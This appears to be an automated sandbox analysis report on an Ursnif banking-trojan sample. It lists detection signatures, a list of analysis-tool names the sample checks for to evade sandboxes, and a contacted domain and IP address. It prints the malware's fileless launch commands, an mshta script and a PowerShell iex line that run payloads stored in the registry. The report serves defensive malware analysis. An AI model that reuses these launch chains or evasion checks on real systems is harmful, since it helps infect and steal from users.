Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXEHK
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: BEHAVIORDUMPER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXEXU
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXEZ
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2633			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6508			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\wscript.exe TID: 1288	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_7030E9E0 IsDebuggerPresent,DebuggerProbe,

28_2_7030E9E0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_702E1D62 LoadLibraryA,GetProcAddress,

28_2_702E1D62

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702F0890 __NMSG_WRITE,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		28_2_702F0890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 28_2_702F8230 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		28_2_702F8230

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: beneficial.odt.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.228.233.17 80			Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_04444BDF cpuid

28_2_04444BDF

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	28_2_702E1813
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,___crtGetLocaleInfoW,_isdigit,	28_2_70302100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,GetUserDefaultLangID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	28_2_702FFDD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	28_2_702FC7E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesA,	28_2_70300830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	28_2_702F00B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,	28_2_70300880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,	28_2_702FD120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,	28_2_70300110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,	28_2_703001D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetACP,GetLocaleInfoA,	28_2_703009C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,	28_2_70300AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,	28_2_702FD4F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,	28_2_7030CD00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,	28_2_7030CD70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	28_2_7030CD50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	28_2_70308540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,	28_2_7030CDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesA,	28_2_70300610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,	28_2_70300690

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_702E1983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

28_2_702E1983

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_04444BDF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

28_2_04444BDF

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 28_2_702E1262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

28_2_702E1262

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: procexp.exe
Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

Mitre Att&ck Matrix

